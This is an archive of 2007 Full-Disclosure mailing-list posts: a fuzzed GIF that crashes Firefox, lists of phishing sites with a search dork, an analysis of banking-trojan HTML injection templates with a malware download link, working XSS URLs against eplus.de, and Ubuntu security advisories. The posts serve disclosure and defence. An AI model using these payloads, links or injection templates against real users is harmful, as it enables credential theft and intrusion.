Re: [Full-disclosure] firefox 2.0.0.2 crash

[Rik Bobbaers]

doesn't do that with a later version of gimp...:

: 10:10 lois ~ ;gimp firefox-crash-save-session-before-clicking.gif
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x23, ignoring.
GIF: bogus character 0xf9, ignoring.
GIF: bogus character 0x04, ignoring.
GIF: bogus character 0x05, ignoring.
GIF: bogus character 0x0a, ignoring.
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x0e, ignoring.
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x04, ignoring.
GIF: bogus character 0x37, ignoring.
GIF: bogus character 0x10, ignoring.
GIF: bogus character 0xc8, ignoring.
GIF: bogus character 0x29, ignoring.
GIF: bogus character 0xea, ignoring.
GIF: bogus character 0xbc, ignoring.
GIF: bogus character 0xb7, ignoring.
GIF: bogus character 0x0e, ignoring.
GIF: bogus character 0x63, ignoring.
GIF: bogus character 0xaa, ignoring.
GIF: bogus character 0xc0, ignoring.
GIF: bogus character 0x40, ignoring.
GIF: bogus character 0xc5, ignoring.
GIF: bogus character 0x0d, ignoring.
GIF: bogus character 0xc7, ignoring.
GIF: bogus character 0x41, ignoring.
GIF: bogus character 0x70, ignoring.
GIF: bogus character 0x9f, ignoring.
GIF: bogus character 0xf4, ignoring.
GIF: bogus character 0x09, ignoring.
GIF: bogus character 0xe4, ignoring.
GIF: bogus character 0x61, ignoring.
GIF: bogus character 0x0c, ignoring.
GIF: bogus character 0x44, ignoring.
GIF: bogus character 0x6b, ignoring.
GIF: bogus character 0x01, ignoring.
GIF: bogus character 0x84, ignoring.
GIF: bogus character 0x36, ignoring.
GIF: bogus character 0xb4, ignoring.
GIF: bogus character 0xe3, ignoring.
GIF: bogus character 0xd9, ignoring.
GIF: bogus character 0x09, ignoring.
GIF: bogus character 0xe8, ignoring.
GIF: bogus character 0xed, ignoring.
GIF: bogus character 0x97, ignoring.
GIF: bogus character 0x9c, ignoring.
GIF: bogus character 0x52, ignoring.
GIF: bogus character 0xad, ignoring.
GIF: bogus character 0xc4, ignoring.
GIF: bogus character 0xf2, ignoring.
GIF: bogus character 0xfd, ignoring.
GIF: bogus character 0x4c, ignoring.
GIF: bogus character 0x84, ignoring.
GIF: bogus character 0x5a, ignoring.
GIF: bogus character 0xb2, ignoring.
GIF: bogus character 0x68, ignoring.
GIF: bogus character 0xdc, ignoring.
GIF: bogus character 0x24, ignoring.
GIF: bogus character 0x97, ignoring.
GIF: bogus character 0x1e, ignoring.
GIF: bogus character 0xa6, ignoring.
GIF: bogus character 0xcf, ignoring.
GIF: bogus character 0xf0, ignoring.
GIF: bogus character 0xac, ignoring.
GIF: bogus character 0x45, ignoring.
GIF: bogus character 0x00, ignoring.
GIF: bogus character 0x00, ignoring.
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: too much input data, ignoring extra...
GIF: bogus character 0x00, ignoring.
GIF: too much input data, ignoring extra...
GIF: bogus character 0x61, ignoring.
GIF: bogus character 0x1a, ignoring.
GIF: bogus character 0xe1, ignoring.
GIF: bogus character 0xe5, ignoring.
GIF: bogus character 0x1c, ignoring.
GIF: bogus character 0xc7, ignoring.
GIF: bogus character 0x84, ignoring.
GIF: bogus character 0x92, ignoring.
GIF: bogus character 0xa5, ignoring.
GIF: bogus character 0xe1, ignoring.
GIF: bogus character 0x10, ignoring.
GIF: bogus character 0xc4, ignoring.
GIF: bogus character 0xda, ignoring.
GIF: bogus character 0x92, ignoring.
GIF: bogus character 0x03, ignoring.
GIF: bogus character 0x6b, ignoring.
GIF: bogus character 0xb2, ignoring.
GIF: bogus character 0x97, ignoring.
GIF: bogus character 0x30, ignoring.
GIF: bogus character 0x0c, ignoring.
GIF: bogus character 0xb6, ignoring.
GIF: bogus character 0x5a, ignoring.
GIF: bogus character 0xef, ignoring.
GIF: bogus character 0xe7, ignoring.
GIF: bogus character 0x30, ignoring.
GIF: bogus character 0xd0, ignoring.
GIF: bogus character 0x54, ignoring.
GIF: bogus character 0x3e, ignoring.
GIF: bogus character 0xa0, ignoring.
GIF: bogus character 0x51, ignoring.
GIF: bogus character 0x38, ignoring.
GIF: bogus character 0x49, ignoring.
GIF: bogus character 0x16, ignoring.
GIF: bogus character 0x8f, ignoring.
GIF: bogus character 0x2a, ignoring.
GIF: bogus character 0xe2, ignoring.
GIF: bogus character 0x12, ignoring.
GIF: bogus character 0xf9, ignoring.
GIF: bogus character 0x1b, ignoring.
GIF: bogus character 0x4c, ignoring.
GIF: bogus character 0x7b, ignoring.
GIF: bogus character 0x8e, ignoring.
GIF: bogus character 0xdf, ignoring.
GIF: bogus character 0xb5, ignoring.
GIF: bogus character 0xe9, ignoring.
GIF: bogus character 0x62, ignoring.
GIF: bogus character 0x72, ignoring.
GIF: bogus character 0x25, ignoring.
GIF: bogus character 0x2f, ignoring.
GIF: bogus character 0x55, ignoring.
GIF: bogus character 0x16, ignoring.
GIF: bogus character 0x6d, ignoring.
GIF: bogus character 0x98, ignoring.
GIF: bogus character 0x38, ignoring.
GIF: bogus character 0x02, ignoring.
GIF: bogus character 0x00, 

Re: [Full-disclosure] firefox 2.0.0.2 crash

[Sam Hocevar]

On Fri, Mar 09, 2007, Tõnu Samuel wrote:

 http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif
 
 I do NOT know anything else than this url. Just seen it in random
 discussion and anyone else I asked knows nothing. Current tests indicate
 that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   I came up with that file using zzuf (http://sam.zoy.org/zzuf/).
Manpage has an example on how to fuzz Firefox.

Cheers,
-- 
Sam.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] A small phishing operation

[phpninja]

http://www.wachmannin.com/
http://www.szukozavrov.net/ http://szukozavrov.net/
http://www.trustguuny.com/
http://www.mennaepolisar.com/
http://www.rasdertan.com/
http://www.billibonce.org/
http://www.nesteasyrve.com/
http://www.raseedibones.com/
http://www.ahuevshayaaffza.com/
http://www.raspizdyaev.net/

All sites have a list1.txt filled with emails for spam and browseable
directory, this was found just searching with google. Im going to bed.

-phpninja
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] R: A small phishing operation

[bunker]

 divAll sites have a list1.txt filled with emails for 
 spamnbsp;and browseable directory, this was found just 
 searchingnbsp;with google.

Here the google dork: http://www.google.it/search?q=%2Bparent+%2B%22index+of+%
2F%22+%2B%22list1.txt%22+mailer

Interesting...

Bye,
Andrea bunker Purificato

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] a heeeee he announcement

[heeeee he]

Dear gmail

we use following email to harvest the fruits of our phising attempts
[1]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]


thanks for reading
he he

[1] http://wireless-mania.com/xcart/templates_c/www.BankOfAmerica.zip

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] a heeeee he announcement

[heeeee he]

dear gmail and web2mail.com

we use following emails to collect the phishing victims' credentials
[1]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]


thanks for reading
he he

[1] 
http://www.contestadofm.com.br/curso/Mais%20Arquivos/.UMporfolio/hfax.online-servive-update.zip

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] a heeee he announcement

[heeeee he]

Dear Gmail and Inbox.com

we use the following email addresses to harvest the fruits of our
phishing attempts [1][2]. Please ban our asses!

[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]

thanks for reading
he he

[1] http://www.wassmail.co.uk/archive/16/113/attachments/wach.zip
[2] http://www.wassmail.co.uk/archive/16/113/attachments/new.zip

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..

[Thierry Zoller]

Dear list,

Whoever deals with these poeple and thinks they are a benign Adware
company (and thus spreads their bundles.

Check this :
Ignoring the fact that they basicaly  install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)

http://secdev.zoller.lu/system32.zip
Pass: 123

I am disgusted. They even created their own XML parser for this ...

An extract of HTML code they inject :
-
inject
url=wellsfargo 
before=name=userid autocomplete='off'/DIV 
what=
DIVLABEL for=useridATM PIN/LABEL:BRSPAN class='mozcloak'INPUT id=pin 
 tabIndex=2 maxLength=4 type=password size=4 name=pin 
autocomplete='off'/SPAN/DIV

block=alt=Go 
check=pin
quan=4
content=d

/inject


Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.

I have no more time feel free to dig deeper.


I especialy liked this :

inject
url=citibank.com 
TRTD colspan=3 class=smallArial noWrapSPAN STYLE='color:red'To prevent 
fraud enter your credit card information please:/SPAN/TD/TR


Puke..

-- 
http://secdev.zoller.lu
Thierry Zoller

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] RIM BlackBerry Pearl 8100 Browser DoS

[mike kemp]

RIM BlackBerry Pearl 8100 Browser DoS
--

12 March 2007

Summary:
A vulnerability has been discovered that could impact upon the availability
of the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a
remote attacker to construct a WML page that contains an overly long string
value within a link (e.g.: a href = aaa etc.). Should the
page or link be accessed by BlackBerry devices, this leads to a temporary
Denial of Service within the 4thPass browser component on the device, and
temporary device inoperability. Normal functionality will be returned to the
browser / device after an amount of time relative to the size of the link
supplied, or by physically removing and reinserting the battery thereby
creating a reset.

Business Impact:
Exploitation of this issue can lead to a loss of device functionality.

Affected Product(s):
The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51)

Remediation:
Upgrade to vendor patch 4.2.1

Additional details of this vulnerability are available from the vendor at
www.blackberry.com/security/news.jsp

Credit:
Michael Kemp (www.clappymonkey.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] firefox 2.0.0.2 crash

[Kristian Hermansen \(khermans\)]

Firefox even crashes if you have it open and visit the site from lynx...

$ lynx http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif

Looking up people.zoy.org
Making HTTP connection to people.zoy.org
Sending HTTP request.
HTTP request sent; waiting for response.
HTTP/1.1 200 OK
Data transfer complete
/usr/bin/firefox '/tmp/ggdfOe/L23367-1095TMP.gif'

lynx: Start file could not be found or is not text/html or text/plain
  Exiting...
--
Kristian Hermansen

___
Date: Fri, 09 Mar 2007 20:31:40 +0200
From: T?nu Samuel [EMAIL PROTECTED]
Subject: [Full-disclosure] firefox 2.0.0.2 crash
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=UTF-8

Can be dupe but in fast browsing over topics I did not discovered this
exploit:

http://people.zoy.org/~sam/firefox-crash-save-session-before-clicking.gif


I do NOT know anything else than this url. Just seen it in random
discussion and anyone else I asked knows nothing. Current tests indicate
that Mozilla 2.0.0.2 gets killed within second, 1.5.0.10 survives.

   T?nu
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Call for Papers: DeepSec IDSC 2007 Europe/Vienna: 20-23 Nov 2007

[Paul Böhm]

DeepSec In-Depth Security Conference 2007 Europe - Nov 20-23 2007 -
Vienna, Austria
http://deepsec.net/

Call for Papers

In light of Austria's active security scene we are pleased to announce
the first annual European DeepSec In-Depth Security Conference[1], to
be held from November 20th to 23rd 2007 in Vienna. We have found a
really nice venue, a hotel in the old imperial riding school in the
heart of the City, and will provide a comprehensive social program
around the event.

We're inviting you to submit papers and proposals for trainings for
the conference. All proposals received before June 10th 2007, 23:59
CET will be considered by the Program Committee.

Also we would like to announce and invite you to the first informal
monthly Security by Candlelight[2] Security-Enthusiast Meeting to be
held in the Viennese non-profit Hackspace/Innovation Center Metalab[3]
on Monday, the 19th of March 2007, 19:30.

[1] http://deepsec.net/
[2] http://metalab.at/wiki/Security_bei_Kerzenschein
[3] http://metalab.at/wiki/English

== About DeepSec ==

DeepSec IDSC is an annual European two-day in-depth Conference on
Computer-, Network-, and Application-Security. The first DeepSec
Conference will be held from November 22nd to 23rd 2007 in Vienna, and
aims to bring together the leading security experts from all over the
world in Europe.

In addition to the conference with thirty-two sessions, four two-day
intense security training courses will be held before the main
conference. The conference program will be augmented with a live
hacking competition and a team capture the flag contest.

DeepSec is a non-product, non-vendor-biased conference. Our aim is to
present the best research and experience from the fields' leading
experts.

Target Audience: Security Officers, Security Professionals and Product
Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and
Firewall-Admins, and Software Developers.

== Speakers/Trainers ==

Until June 10th, 23:59 CET, we'll be accepting papers and lightning
talk submissions.
Please note we are non-product, non-vendor biased security conference,
and do not accept vendor pitches.

Speaker privileges include

   * One economy class return-ticket to Vienna.
   * 3 nights of accomodation in the Conference Hotel.
   * Breakfast, Lunch, and two coffee breaks
   * Speaker activities during, before, and after the conference.
   * Speaker After-Party in the Metalab Hackerspace on November, 24th.

Trainer privileges include

   * 50% of the net profit of the class.
   * 2 nights of accomodation in the Conference Hotel during the trainings.
   * Breakfast, Lunch, and two coffee breaks.
   * Free Speaker Ticket for the Conference.
   * Speaker activities during, before, and after the conference.
   * Speaker After-Party in the Metalab Hackerspace on the 24th November

== Topics ==

We are interested in bleeding edge security research, directly from
leading researchers, professionals in academics, industry, and
government, and the underground security community. Topics of special
interest include

   * Vista, Linux, OSX Security
   * E/I-Voting Case-Studies, Attacks, Weaknesses
   * Mobile Security
   * Network Protocol Analysis
   * AJAX/Web2.0/Javascript Security
   * Secure Software Development
   * VoIP
   * Perimeter Defense / Firewall Technology
   * Digital Forensics
   * WLAN/WiFi, GPRS, IPv6 and 3G Security
   * IPv6
   * Smart Card Security
   * Cryptography
   * Intrusion Detection
   * Incident Response
   * Rootkit Detection, Techniques, and Defense
   * Security Properties of Web-Frameworks
   * Malicious Code Analysis
   * Secure Framework Design
   * .Net and Java Security

== Submission ==

Proposals for presentations and trainings at the first annual
DeepSec In-Depth Security Conference will be accepted until June 10th
2007, 23:59 CET.

All proposals should be submitted over the web at http://www.deepsec.net/cfp/.
If you have questions, want to send us additional material, or have
problems with the webform, feel free to contact us at [EMAIL PROTECTED]

Regards
paul

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS on eplus.de, german mobile telephony provider

[Hanno Böck]

Here we go:
 
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort=;scriptalert(1)/script
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus-unternehmen.de/frame.asp?go=');alert('
 
Already fixed ones:
http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/
http://www.eplus-unternehmen.de/frame.asp?go=http://[EMAIL PROTECTED]
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus-unternehmen.de/frame.asp?go=http://www.eplus.de.mydomain.com

With lot's of work done by alexander brachmann, www.bitsploit.de.
All have been reported to E-Plus before.

Blog-entry english:
http://www.hboeck.de/item/458

Blog-entry german (more detailed):
http://www.hboeck.de/item/457

-- 
Hanno Böck  Blog:   http://www.hboeck.de/
GPG: 3DBD3B20   Jabber: [EMAIL PROTECTED]


pgpkVjTgg35kM.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is OWASP vulnerable ??

[Steven M. Christey]

Not to reduce the high signal-to-noise ratio on this thread, but I
suspect there are lots of eval injection vulnerabilities in
Javascript-heavy applications, but they don't seem to be reported to
the usual places, or maybe people just call them XSS.  Perl, PHP, and
other interpreted languages have eval injection too, but at least
they're reported occasionally.

- Steve

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PHP import_request_variables() arbitrary variable overwrite

[Steven M. Christey]

Stefano Di Paola said:

1. I search on google for import_request_variables advisories
(nothing found)
2. I search on php.net in changeLog for fixes (nothing found).

I can see why you weren't able to find anything.  However, there have
been a number of disclosures that are probably related - but these
were grep-and-gripe affairs in third party applications, where the
researcher didn't necessarily investigate *why* certain attacks
worked.

Grepping for superglobal names through CVE suggests the following PHP
application issues might be related to this behavior, although in some
cases it could just be some extract() or dynamic variable evaluation
or other method for overwriting critical variables:

CVE-2007-1024 - _SERVER[DOCUMENT_ROOT]
CVE-2006-4673 - _SERVER[REMOTE_ADDR]  (might be extract)
CVE-2006-4545 - _SERVER[DOCUMENT_ROOT]
CVE-2006-3798 - _SERVER, _ENV, _COOKIE (extract)
CVE-2006-1914 - GLOBALS, _SERVER
CVE-2005-4318 - _SERVER[REMOTE_ADDR]
CVE-2005-4317 - _SERVER[REMOTE_ADDR]
CVE-2005-3926 - _SERVER[REMOTE_ADDR]
CVE-2005-2574 -  _SERVER[REMOTE_ADDR] (extract)
CVE-2005-1996 - _SERVER[DOCUMENT_ROOT]
CVE-2005-3300 - _FILES
CVE-2007-0599 - SERVER
CVE-2006-5796 - _SESSION[docroot_path]
CVE-2006-5078 - _SESSION[dirMain]
CVE-2006-2828 - import_request_variables(), but not for superglobals

etc.


- Steve

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-435-1] Xine vulnerability

[Kees Cook]

=== 
Ubuntu Security Notice USN-435-1 March 12, 2007
xine-lib vulnerability
CVE-2007-1387
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  libxine1c2   1.0.1-1ubuntu10.9

Ubuntu 6.06 LTS:
  libxine-main11.1.1+ubuntu2-7.7

Ubuntu 6.10:
  libxine1 1.1.2+repacked1-0ubuntu3.4

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Moritz Jodeit discovered that the DirectShow loader of Xine did not 
correctly validate the size of an allocated buffer.  By tricking a user 
into opening a specially crafted media file, an attacker could execute 
arbitrary code with the user's privileges.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.9.diff.gz
  Size/MD5:12233 675e1e62de2463b908fd32aeb9bfe60a

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.9.dsc
  Size/MD5: 1187 f9cdbdaba61da69e0b938dce158b0f3d

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz
  Size/MD5:  7774954 9be804b337c6c3a2e202c5a7237cb0f8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.9_amd64.deb
  Size/MD5:   109360 2fdbe1a14a39938370da76ba8bab0536

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.9_amd64.deb
  Size/MD5:  3611982 be994d0cc19f633ec74871cbd8a8d354

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.9_i386.deb
  Size/MD5:   109366 7b4eca37fe190aa0efbab7cfe66d6dcb

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.9_i386.deb
  Size/MD5:  4005084 2826411084dff3fe99d72478646bc9ed

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.9_powerpc.deb
  Size/MD5:   109354 8748b83cbdca49037a48236bf0a29192

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.9_powerpc.deb
  Size/MD5:  3850630 4fe2ded6b53b4f814cecef7929e94643

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.9_sparc.deb
  Size/MD5:   109372 01d4c3f30fea1f692476f92560c18e2b

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.9_sparc.deb
  Size/MD5:  3695886 c272d0b130739cbb690c2916ef246880

Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.7.diff.gz
  Size/MD5:19938 47e5b5f3b185adb45ad836e183a95c46

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.7.dsc
  Size/MD5: 1113 143dcfd0208da129a9f6b553be5774be

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz
  Size/MD5:  6099365 5d0f3988e4d95f6af6f3caf2130ee992

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.7_amd64.deb
  Size/MD5:   115898 14542eec0dab285f5cc34b9704bf

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.7_amd64.deb
  Size/MD5:  2615330 5cf4471e1563637f4d9f6b084b6b365a

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.7_i386.deb
  Size/MD5:   115910 05ac35f926ba3f47d0d2eba8875bd3f8

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.7_i386.deb
  Size/MD5:  2934426 3206757c9cf743813477ff214be1e769

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.7_powerpc.deb
  Size/MD5:   115900 2f093ac6c4b3a0709a054ea9daca3a27

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.7_powerpc.deb
  Size/MD5:  2725058 a0cc602a29cc664c32d0cf5694112683

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.7_sparc.deb
  Size/MD5:   115904 8011e1182c9ae79001083f4215cc208d

http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.7_sparc.deb

[Full-disclosure] new AttackAPI

[pdp (architect)]

for those who are interested in Web 2.0 security, there is a new
version of AttackAPI that you can download from here:

http://www.gnucitizen.org/projects/attackapi/

There is still no documentation which is a bit of a drawback, but that
will be generated soon. If there is anyone interested in documenting
some of the features, please contact us.

There is a also a simple bookmarklet that you can use to load
AttackAPI on any page. You can install it from here:

http://www.gnucitizen.org/projects/load-attackapi-bookmarklet

-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [USN-436-1] KTorrent vulnerabilities

[Kees Cook]

=== 
Ubuntu Security Notice USN-436-1 March 12, 2007
ktorrent vulnerabilities
CVE-2007-1384, CVE-2007-1385
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  ktorrent 1.2-0ubuntu5.1

Ubuntu 6.10:
  ktorrent 2.0.3+dfsg1-0ubuntu1.1

After a standard system upgrade you need to restart KTorrent to effect 
the necessary changes.

Details follow:

Bryan Burns of Juniper Networks discovered that KTorrent did not 
correctly validate the destination file paths nor the HAVE statements 
sent by torrent peers.  A malicious remote peer could send specially 
crafted messages to overwrite files or execute arbitrary code with user 
privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1.diff.gz
  Size/MD5:43785 79df81a2daf88ed095153f8b664f7da4

http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1.dsc
  Size/MD5:  785 b33cc9609741465d1acfed4c3e86c87e

http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2.orig.tar.gz
  Size/MD5:  1447380 55c6c4ae679aea0ba0370058856ddb92

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1_amd64.deb
  Size/MD5:   799590 1e15c2c9901fe1bd815d3ebebc33c841

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1_i386.deb
  Size/MD5:   756604 9d33c77836ca569ac77e5cb1e43727e5

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1_powerpc.deb
  Size/MD5:   790462 59620e287be8fa5f39725c579516d580

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_1.2-0ubuntu5.1_sparc.deb
  Size/MD5:   759414 53bcc7c1baf8bf5a6d2f21fd4677ab34

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1.diff.gz
  Size/MD5:   336981 510bbd0ce41892c3f73580c6912e8cca

http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1.dsc
  Size/MD5:  754 fba0cabd58450420a144ce4aceec77e1

http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1.orig.tar.gz
  Size/MD5:  2183661 891f2cc509331a4283f958b068bbcf7d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1_amd64.deb
  Size/MD5:  1220846 74e7cbb176c3167fd3ebc1262a83fb69

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1_i386.deb
  Size/MD5:  1182658 0d40b9c135c6f835da909aee5a7320a5

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1_powerpc.deb
  Size/MD5:  1205360 1748f978c4bd43e805bd64615e5cebee

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/k/ktorrent/ktorrent_2.0.3+dfsg1-0ubuntu1.1_sparc.deb
  Size/MD5:  1159794 8c7988c495afa48bae90fc1d21f49d71



signature.asc
Description: Digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XSS on eplus.de, german mobile telephony provider

[security]

Hi Hanno Böck,

We have mirrored the affected websites on XSSed.com. You are welcome to
post to XSSed.com any more XSS vulnerabilities that you discover.

To the rest of the subscribers and readers of Full-disclosure - if you
find a XSS vulnerable website, you can post it on www.XSSed.com. The
affected websites are saved automatically in the on-hold archive until
review by our staff. We classify the published websites into high-profiled
- gov, mil, famous - and not. If you want to know more about the goals of
XSSed.com, please read this news:
http://www.xssed.com/news/22/XSSed.com_What_Who_Why/


We allow submission of vulnerabilities that can be exploited against
users, such as http response splitting, frame injection, CSRF/XSRF.


Dim
--
XSSed.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/